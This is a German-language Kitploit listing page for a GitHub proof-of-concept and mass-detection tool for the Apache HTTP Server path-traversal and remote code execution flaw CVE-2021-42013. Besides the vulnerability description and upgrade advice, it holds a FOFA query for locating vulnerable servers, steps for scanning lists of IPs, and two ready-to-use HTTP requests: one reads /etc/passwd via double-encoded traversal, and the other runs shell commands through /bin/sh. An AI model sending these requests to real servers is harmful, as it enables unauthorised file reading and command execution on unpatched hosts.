Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-42013-Apache-RCE-Poc-Exp — Apache Remote Code Execution (CVE-2021-42013) Mass Detection Tool: Der Apache HTTP Server ist ein quelloffener Webserver der Apache Software Foundation. Er zeichnet sich durch Schnelligkeit, Zuverlässigkeit und Erweiterbarkeit über eine einfache API aus. Es wurde festgestellt, dass der Fix für CVE-2021-41773 in Apache HTTP Server 2.4.50 unzureichend ist. Angreifer können mithilfe eines Path-Traversal-Angriffs URLs auf Dateien außerhalb von Verzeichnissen abbilden, die durch ähnliche Alias-Direktiven konfiguriert wurden. Wenn diese Dateien außerhalb der Verzeichnisse nicht durch die übliche Standardkonfiguration „Require all denied“ geschützt sind, können solche Anfragen erfolgreich sein. Wenn für diese Alias-Pfade zudem CGI-Skripte aktiviert sind, kann dies Remote Code Execution ermöglichen. Dieses Problem betrifft nur Apache 2.4.49 und Apache 2.4.50, nicht frühere Versionen. | Kitploit
Tools/GitHubGitHub/asaotomo/cve-2021-42013-apache-rce-poc-exp
AufklärungSchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstests
GitHubasaotomo/cve-2021-42013-apache-rce-poc-exp

CVE-2021-42013-Apache-RCE-Poc-Exp

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
1023vor 4 JahrenNoch nicht geprüft

Über

Apache Remote Code Execution (CVE-2021-42013) Mass Detection Tool: Der Apache HTTP Server ist ein quelloffener Webserver der Apache Software Foundation. Er zeichnet sich durch Schnelligkeit, Zuverlässigkeit und Erweiterbarkeit über eine einfache API aus. Es wurde festgestellt, dass der Fix für CVE-2021-41773 in Apache HTTP Server 2.4.50 unzureichend ist. Angreifer können mithilfe eines Path-Traversal-Angriffs URLs auf Dateien außerhalb von Verzeichnissen abbilden, die durch ähnliche Alias-Direktiven konfiguriert wurden. Wenn diese Dateien außerhalb der Verzeichnisse nicht durch die übliche Standardkonfiguration „Require all denied“ geschützt sind, können solche Anfragen erfolgreich sein. Wenn für diese Alias-Pfade zudem CGI-Skripte aktiviert sind, kann dies Remote Code Execution ermöglichen. Dieses Problem betrifft nur Apache 2.4.49 und Apache 2.4.50, nicht frühere Versionen.

Teilen

Schwachstellenname

Apache Remote Code Execution (CVE-2021-42013)

Schwachstellenbeschreibung

Der Apache HTTP Server ist ein Open-Source-Webserver der Apache Software Foundation. Er zeichnet sich durch Schnelligkeit, Zuverlässigkeit und einfache Erweiterbarkeit über eine API aus. Es wurde festgestellt, dass der Fix für CVE-2021-41773 in Apache HTTP Server 2.4.50 unzureichend war. Angreifer können mithilfe eines Path-Traversal-Angriffs URLs auf Dateien außerhalb der durch Alias-Direktiven konfigurierten Verzeichnisse abbilden. Wenn diese Dateien außerhalb der Verzeichnisse nicht durch die übliche Standardkonfiguration „Require all denied“ geschützt sind, könnten diese Anfragen erfolgreich sein. Wenn für diese Alias-Pfade zudem CGI-Skripte aktiviert sind, könnte dies eine Remote Code Execution ermöglichen. Dieses Problem betrifft nur Apache 2.4.49 und Apache 2.4.50, nicht frühere Versionen.

Betroffene Versionen

Apache HTTP Server 2.4.49

Apache HTTP Server 2.4.50

FOFA-Syntax

server="Apache/2.4.49" || server="Apache/2.4.50"

Verwendung

root@kitploit:~
1.将准备检测的IP地址放入ip.txt文件中
2.运行python3 check.py
image

POC

root@kitploit:~
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
image

EXP

root@kitploit:~
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57

echo Content-Type: text/plain; echo;ls /

img

Behebungsvorschläge

Diese Schwachstellen wurden bereits behoben. Angesichts der Schwere der Schwachstellen wird empfohlen, dass betroffene Benutzer sofort auf Apache HTTP Server 2.4.51 (veröffentlicht am 7. Oktober) oder eine neuere Version aktualisieren.

Download-Link:

https://httpd.apache.org/download.cgi#apache24

Hinweise

Dieses Tool wird nur Sicherheitstestern zur Selbstüberprüfung zur Verfügung gestellt. Der Autor haftet nicht für jegliche Folgen aus Missbrauch durch den Benutzer. Der Benutzer ist verpflichtet, die örtlichen Gesetze einzuhalten. Dieses Programm ist nicht für den kommerziellen Gebrauch bestimmt und dient nur dem Lern- und Austauschzweck.

147206848-6090876d-d029-4ffd-a6a8-ee4600071404
Tool herunterladen